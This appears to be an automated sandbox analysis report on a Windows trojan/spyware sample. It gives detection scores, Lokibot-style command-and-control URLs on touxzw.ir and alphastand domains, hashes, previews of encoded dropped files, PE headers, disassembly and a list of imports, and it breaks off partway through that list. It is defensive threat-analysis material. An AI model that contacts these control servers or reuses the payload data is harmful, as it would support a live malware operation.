                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  vsf098633534.exe30%VirustotalBrowse
                  vsf098633534.exe29%ReversingLabsWin32.Trojan.AutoitInject
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://touxzw.ir/sccc/five/fre.php100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  touxzw.ir
                  104.21.64.1
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    http://touxzw.ir/sccc/five/fre.phptrue
                    • Avira URL Cloud: malware
                    unknown
                    http://kbfvzoboss.bid/alien/fre.phpfalse
                      high
                      http://alphastand.win/alien/fre.phpfalse
                        high
                        http://alphastand.trade/alien/fre.phpfalse
                          high
                          http://alphastand.top/alien/fre.phpfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.ibsensoftware.com/svchost.exe, svchost.exe, 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              104.21.64.1
                              touxzw.irUnited States
                              13335CLOUDFLARENETUSfalse
                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1619628
                              Start date and time:2025-02-20 03:42:20 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 27s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:vsf098633534.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@3/6@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 58
                              • Number of non-executed functions: 276
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              TimeTypeDescription
                              21:43:16API Interceptor61x Sleep call for process: svchost.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              104.21.64.1laser.ps1Get hashmaliciousFormBookBrowse
                              • www.lucynoel6465.shop/jgkl/
                              UPDATED SOA.pdf.exeGet hashmaliciousFormBookBrowse
                              • www.shlomi.app/t3l4/
                              QUOTE OF DRY DOCK REPAIR.exeGet hashmaliciousFormBookBrowse
                              • www.arryongro-nambe.live/ljgq/
                              QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                              • www.askvtwv8.top/2875/
                              Revised Order Confirmation.exeGet hashmaliciousFormBookBrowse
                              • www.lucynoel6465.shop/hbfq/
                              UPIlkrNpsh.exeGet hashmaliciousUnknownBrowse
                              • xerecao.cc/
                              engine.ps1Get hashmaliciousFormBookBrowse
                              • www.askvtwv8.top/b8fe/
                              laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                              • www.lucynoel6465.shop/jgkl/
                              new quotation.exeGet hashmaliciousFormBookBrowse
                              • www.shlomi.app/378r/
                              PO 87877889X,pdf.Vbs.vbsGet hashmaliciousFormBookBrowse
                              • www.lucynoel6465.shop/jgkl/
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              touxzw.irscan_0219025_pdf.exeGet hashmaliciousLokibotBrowse
                              • 104.21.112.1
                              scan_07022025_pdf.exeGet hashmaliciousDarkTortilla, LokibotBrowse
                              • 104.21.112.1
                              specs_916351_xlsx.exeGet hashmaliciousLokibotBrowse
                              • 104.21.48.1
                              specs_00235_xlsx.exeGet hashmaliciousLokibotBrowse
                              • 104.21.32.1
                              specs_12788_xls.exeGet hashmaliciousLokibotBrowse
                              • 104.21.48.1
                              LEmJJ87mUQ.exeGet hashmaliciousLokibotBrowse
                              • 172.67.134.88
                              lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                              • 188.114.97.3
                              zxalphamn.docGet hashmaliciousLokibotBrowse
                              • 188.114.96.9
                              DRAFT DOC2406656.bat.exeGet hashmaliciousLokibotBrowse
                              • 188.114.96.3
                              Comprobante.PDF867564575869708776565434576897.exeGet hashmaliciousLokibotBrowse
                              • 188.114.96.3
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUSRECEIPT ATTACHMENT.exeGet hashmaliciousSnake KeyloggerBrowse
                              • 104.21.64.1
                              malhex.bin.exeGet hashmaliciousIcedIDBrowse
                              • 104.18.36.19
                              testfile.pdfGet hashmaliciousHTMLPhisherBrowse
                              • 104.18.95.41
                              malhex.bin.exeGet hashmaliciousIcedIDBrowse
                              • 172.64.151.237
                              Staff-Changes.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                              • 104.17.248.203
                              customs declaration form (china translate).exeGet hashmaliciousAgentTeslaBrowse
                              • 172.67.74.152
                              http://harnessmaster.com.au/Get hashmaliciousUnknownBrowse
                              • 104.17.25.14
                              https://metaworldlogin.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                              • 172.64.151.8
                              https://appealinfringementmarketingflare.vercel.app/3a36efff&cf6=5a&1eG=K9dHF3da4b=D400eGet hashmaliciousHTMLPhisherBrowse
                              • 172.67.75.166
                              https://appealinfringementmarketingflare.vercel.app/3a36efff&cf6=5a&1eG=K9dHF3da4b=D400e.htmlGet hashmaliciousHTMLPhisherBrowse
                              • 104.26.5.15
                              No context
                              No context
                              Process:C:\Users\user\Desktop\vsf098633534.exe
                              File Type:ASCII text, with very long lines (28674), with no line terminators
                              Category:dropped
                              Size (bytes):28674
                              Entropy (8bit):3.5804687143373863
                              Encrypted:false
                              SSDEEP:768:X9QA+dD/VzCaynKpACXECY9wVsMQZBRRq26dS3xlO:uA+R//sdq264+
                              MD5:F8A06F830B97695FD12EFBCE21CE7AC6
                              SHA1:6904AF1CEA82628BF200F6EA0220A1C6B31D3D20
                              SHA-256:433D1EDB99371C9ED01664D397427B5F4DC75E2924EA50747D06B5442F22D4D5
                              SHA-512:9007897B1CF89B5769A9B81F6075B4C61B1E1D99736477615AA36EF8864B40CD6BF7C4590346F75109C4377C7066DBAF77BB7C16A6F598E866364066CE332475
                              Malicious:false
                              Reputation:low
                              Preview:&n##.tsu.'suuu&$&&&&# #!t. t&&&&&& ./"#."t/ #&&&&&& ./"r. tw!$&&&&&& ./##..t. s&&&&&& ./"#.wt/ #&&&&&& ./"r.utw u&&&&&& ./##.st.%%&&&&&& ./"#/&t/%$&&&&&& ./"r/$tw$s&&&&&& ./##/"t. "&&&&&& ./"#/ t/ u&&&&&& ./"r/.tw u&&&&&& ./##/w%%u& ./"#/ut/ s&&&&&& ./.r""pppppptw!"&&&&&& .//#" ppppppt. "&&&&&& ./.#".ppppppt/ u&&&&&& ./.r"wpppppptw u&&&&&& .//#"uppppppt.$s&&&&&& ./.#"sppppppt/ "&&&&&& ./.r#&pppppptw u&&&&&& .//##$ppppppt. u&&&&&& ./.##"pppppp%%u/ ./.r# pppppptw!#&&&&&& ./##r&t.!%&&&&&& ./"#r$t/ #&&&&&& ./"rr"tw!$&&&&&& ./##r t.%%&&&&&& ./"#r.t/%$&&&&&& ./"rrwtw$s&&&&&& ./##rut. "&&&&&& ./"#rst/ u&&&&&& ./"rs&tw u&&&&&& ./##s$%%u& ./"#s"t/ '&&&&&& ./.r .pppppptw "&&&&&& .//# wppppppt.! &&&&&& ./.# uppppppt/ '&&&&&& ./.r spppppptw!&&&&&&& .//#!&ppppppt. /&&&&&& ./.#!$ppppppt/%%&&&&&& ./.r!"pppppptw%$&&&&&& .//#! ppppppt.$s&&&&&& ./.#!.ppppppt/ "&&&&&& ./.r!wpppppptw u&&&&&& .//#!uppppppt. u&&&&&& ./.#!spppppp%%u/ ./"r.&tw!%&&&&&& ./##w&t. .
                              Process:C:\Users\user\Desktop\vsf098633534.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):82796
                              Entropy (8bit):7.9644146196240815
                              Encrypted:false
                              SSDEEP:1536:bUIrCdWSHl8g2gj9dkyVbX0tVpG1EaUT90/hvaQDDgpTJjPFLQ9Q44fuF8JAXto4:boASF8g2CdMVYEaUOiQD4JZ7uKJ+V
                              MD5:1629D0FD2FDF9323DCFAD3E1959AEA32
                              SHA1:D0E2C6A3449E60F9318BD356B63BF0E8503463ED
                              SHA-256:08DA94BDED104007900CCAFBE84339D4CEFF941116A9BE03DBAF6484085246C8
                              SHA-512:CEAE1D2342E23E243CCEA3423B35882A936ED54B1A767DF9738E1DCF8A6197D736FCA59AB065B9CFE64162D13739D9293121982F862506A50959CC622D192B20
                              Malicious:false
                              Reputation:low
                              Preview:EA06......8..=..J..j.....Z....^.D.T.TP.2.Q....y....{..2.Z..?..b...^p.8..[7.N...]<..d...Mw.Hl.....=...M.]Z.M.4:M:.....^....(..7....zj..Fo.......9..z(.~G.....h.{........g.....+.......fk.........~..w...}.>.E.K..&.{.7.......t....P|`...*..].cH...Q0..lj..5"iD.U..Z%K.M...v:5.kX..".P.b.T...=.-.kM.U.B..........R....T...5ZU..%.0j.J.h...P.>.tJ...[......Ujt`....g.......Q@&1q.Tj...o..O..n.Y=Ry3...@,T....&....g.......M6....@.....V....L.c..Q..[4..O6P.6..`.9.zx.............E..V.m....B.&cj.^...H.z....B.E.k(3*....U....R_B....L.F....f..}..0.Ph.}.>Y].S@..N.y../......ah.[.....R...g..f..}...<R.....U..T.mh.`.P*Wz-6.I.r)..X..*.*T..U.....H.U..g...|b.u.Ej.C..B.@.\Z@.Y=?.)..1..%..x..)...#7..*.......h .....T.4..{.\.T.P\.V.K..j@.G..G.Q(.....T.q.5...o>.T.....K..36..w.).T....g...&.n.4.t...t......wy......................W.np{.NG...P;1......X.}xu.}...).]dS.Q.u.4.6....b6..F.9...n.....B...g.^.Q*\>%v..Fw<u.<..... .v./[..w...3a..R.4|...r.ig......!X.c.F..Ll.N..j.......i......
                              Process:C:\Users\user\Desktop\vsf098633534.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):9768
                              Entropy (8bit):7.627427881699107
                              Encrypted:false
                              SSDEEP:192:6JVLuam+BbAnlvfd+lVxo9K1nlNaz1ljAQDudWRefOL4FA8bx7Z5KNyQybSX:67uamwbMltmoQnlg19AQKdvpFA8bx7ZA
                              MD5:05147AF906C977E68C80626AE266E639
                              SHA1:359960C667DB68AC936F80D3F2DE5B5341BC6A05
                              SHA-256:F4E36C0D1C9013ACA9E5C3AF8FCB23345032F01783625FBA5835341105A86197
                              SHA-512:9AA3C61DD840B26519418EEBCCA6C8E5B92AA818E9CF2E4B1919EE5585BEF5518F00FF03D35636550ED6E6C3D3C753D2850D82DBDE39C179EBCD24F6B513A4EB
                              Malicious:false
                              Reputation:low
                              Preview:EA06..p..[.r9u..u.I.w[..M$....9..Ct.H.....M .K..)..Et..$`.]....y...K........|.p.o..t............@../.]%.P...R.%..$.Z.G/..6. .o.@..]@...p.g./..d.P..]@...N.R)........./......r.%.9...c ....Aw.H.......F.3<..\..6...L........x.F....B^.....]. 0...Rk..B...\..5_..D.....5_..\.U...5_....U..`5_..L.U...5\..>2p..H.^.w.Z..G .z.C .....@.......0.G. /Z.H%......j^...u.B.u....$.../.C....d G_T......n`>_.......zG#.....p....@.......@...........`.M..`... ...u...@....'.".].{>K...c.H. ..]$.._..\......>K.#G.t..3|wY0.G.".]d.8_..Gu..i|wY....u.h...p........!.H..+....Hd.P;....K.rP.L..7.p.f..+..fd.I|.. .K.@...f...E...Y.4..3.)%....H@......w)4....P.....2p....<d....,vN........K.!+..'$.....,fC$..WI.......r.$.X..c2...Ip.Y.!...Gd.....,f./.... .#!....c.P......,.\.h.s.....,vJ......t.I...x40......d@...K......4..@.6.-..p..R...$...RP.N...;#.`.../.H.....G.....c.0..\...wx.....v@........E....K.y6....p.c2..."..b.!....F ...@B5u.Ie.........vB......d.[..^...B20....;..X...w.HA.......p..e.....$r....u...
                              Process:C:\Users\user\Desktop\vsf098633534.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):106496
                              Entropy (8bit):7.51959111824812
                              Encrypted:false
                              SSDEEP:1536:s1lGPGEz2DBf+Pi7wxkv2iX78/Y91g/goI/Fe/01eg6BZcjy403Mh7BBQldUNUD0:q0PGpQiXXh7g4oax1eg6eGx3M77CiqD0
                              MD5:0C6E82667069C21AE6B40EB7DD06952D
                              SHA1:594FEE73ABF6C300A01B64769041E4273CB86306
                              SHA-256:EBD2E8A921B1F5C8D94A278052AFEA2D1003214F794AD770D7743B1434184EC8
                              SHA-512:56063F694B4CBE225E52DEBA9788F6790E0AC840D38D1089DD3C240E15A225642ECFFB57A65D62365337A6577B48BBBE2C5876164751C5F868A3E75BA8F52BD0
                              Malicious:false
                              Reputation:low
                              Preview:...NGDRJAETI..UZ.C5HRWND.RJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRW.DDRDZ.ZI.X.{.By.s.&-7r:7*3;.<u9&-['&w,!d ?+e='o...g.Z,7yCINvJEETIOQ..?...D...R...S......U.......D...M...C.zq....X...\..._.....^...S..S......Q..z....R.ww....G... ]..A.DDRJEETI..UZ.B1H._".DRJEETIO.UYFH4DRWvEDR.METIOQ.cFC5XRWN.ERJE.TI_QUZEC5MRVNDDRJ@EUIOQUZGc?HRSNDDRJEGTI.QUJGC%HRWNTDRZEETIOQEZGC5HRWNDDR..DT-OQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5H.VN.DRJEETIOQUZGC5HRWNDDRJEETIO.!??75HR.xEDRZEETqNQU^GC5HRWNDDRJEETiOQ5t5'T<3WN$.RJE.UIO.UZG.4HRWNDDRJEETIO.UZ.mQ)&6NDDv.MET.NQUXGC56SWNDDRJEETIOQU.GC.f*WNDDRJEeTIOQ_ZGc5HR.ODDRJEETIOQUZGC5H.WNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETIOQUZGC5HRWNDDRJEETI
                              Process:C:\Windows\SysWOW64\svchost.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:1
                              Process:C:\Windows\SysWOW64\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):46
                              Entropy (8bit):1.0424600748477153
                              Encrypted:false
                              SSDEEP:3:/lbq:4
                              MD5:8CB7B7F28464C3FCBAE8A10C46204572
                              SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                              SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                              SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:........................................user.
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.851506071240427
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:vsf098633534.exe
                              File size:968'192 bytes
                              MD5:cb68430ac5f87fddaf2af8477b82308c
                              SHA1:4b86f7f627f7bb989fc02e76dfe687c7d0d5ca91
                              SHA256:5eb39af58bc99962a6439d873bda78086903301b0476ef79daf3802220fdf382
                              SHA512:0c561291305ef66ee82712dad69d7e3c29eec29937990838bde6938e6db2802d6c8f93c9d54ca2beb22aba6a72dcd894b1dceff40b1593ed52ae5455d7efaafe
                              SSDEEP:12288:5u6JWgXT7rKfXNeKgOIc0nAWY/ySWHDVz/Vovh7V1C0NnCGso9fgBDYgaYT8JryW:5u6J33O0c+JY5UZ+XC0kGso6FaglgWY
                              TLSH:4325AE2273DDC360CB669173BF69B7016EBF3C614630B85B2F980D7DA950162262D7A3
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                              Icon Hash:aaf3e3e3938382a0
                              Entrypoint:0x427dcd
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x67B68006 [Thu Feb 20 01:06:14 2025 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                              Instruction
                              call 00007FE6984D635Ah
                              jmp 00007FE6984C9124h
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              push edi
                              push esi
                              mov esi, dword ptr [esp+10h]
                              mov ecx, dword ptr [esp+14h]
                              mov edi, dword ptr [esp+0Ch]
                              mov eax, ecx
                              mov edx, ecx
                              add eax, esi
                              cmp edi, esi
                              jbe 00007FE6984C92AAh
                              cmp edi, eax
                              jc 00007FE6984C960Eh
                              bt dword ptr [004C31FCh], 01h
                              jnc 00007FE6984C92A9h
                              rep movsb
                              jmp 00007FE6984C95BCh
                              cmp ecx, 00000080h
                              jc 00007FE6984C9474h
                              mov eax, edi
                              xor eax, esi
                              test eax, 0000000Fh
                              jne 00007FE6984C92B0h
                              bt dword ptr [004BE324h], 01h
                              jc 00007FE6984C9780h
                              bt dword ptr [004C31FCh], 00000000h
                              jnc 00007FE6984C944Dh
                              test edi, 00000003h
                              jne 00007FE6984C945Eh
                              test esi, 00000003h
                              jne 00007FE6984C943Dh
                              bt edi, 02h
                              jnc 00007FE6984C92AFh
                              mov eax, dword ptr [esi]
                              sub ecx, 04h
                              lea esi, dword ptr [esi+04h]
                              mov dword ptr [edi], eax
                              lea edi, dword ptr [edi+04h]
                              bt edi, 03h
                              jnc 00007FE6984C92B3h
                              movq xmm1, qword ptr [esi]
                              sub ecx, 08h
                              lea esi, dword ptr [esi+08h]
                              movq qword ptr [edi], xmm1
                              lea edi, dword ptr [edi+08h]
                              test esi, 00000007h
                              je 00007FE6984C9305h
                              bt esi, 03h
                              jnc 00007FE6984C9358h
                              Programming Language:
                              • [ASM] VS2013 build 21005
                              • [ C ] VS2013 build 21005
                              • [C++] VS2013 build 21005
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [ASM] VS2013 UPD4 build 31101
                              • [RES] VS2013 build 21005
                              • [LNK] VS2013 UPD4 build 31101
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x23dbc.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xeb0000x711c.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0xc70000x23dbc0x23e0055bff7fe4f626786f64f1ca361faab89False0.8171480291811847data7.586997349910274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xeb0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                              RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                              RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                              RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                              RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                              RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                              RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                              RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                              RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                              RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                              RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                              RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                              RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                              RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                              RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                              RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                              RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                              RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                              RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                              RT_RCDATA0xcf7b80x1b082data1.000370296779321
                              RT_GROUP_ICON0xea83c0x76dataEnglishGreat Britain0.6610169491525424
                              RT_GROUP_ICON0xea8b40x14dataEnglishGreat Britain1.25
                              RT_GROUP_ICON0xea8c80x14dataEnglishGreat Britain1.15
                              RT_GROUP_ICON0xea8dc0x14dataEnglishGreat Britain1.25
                              RT_VERSION0xea8f00xdcdataEnglishGreat Britain0.6181818181818182
                              RT_MANIFEST0xea9cc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                              DLLImport
                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                              PSAPI.DLLGetProcessMemoryInfo
                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                              UxTheme.dllIsThemeActive
                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, 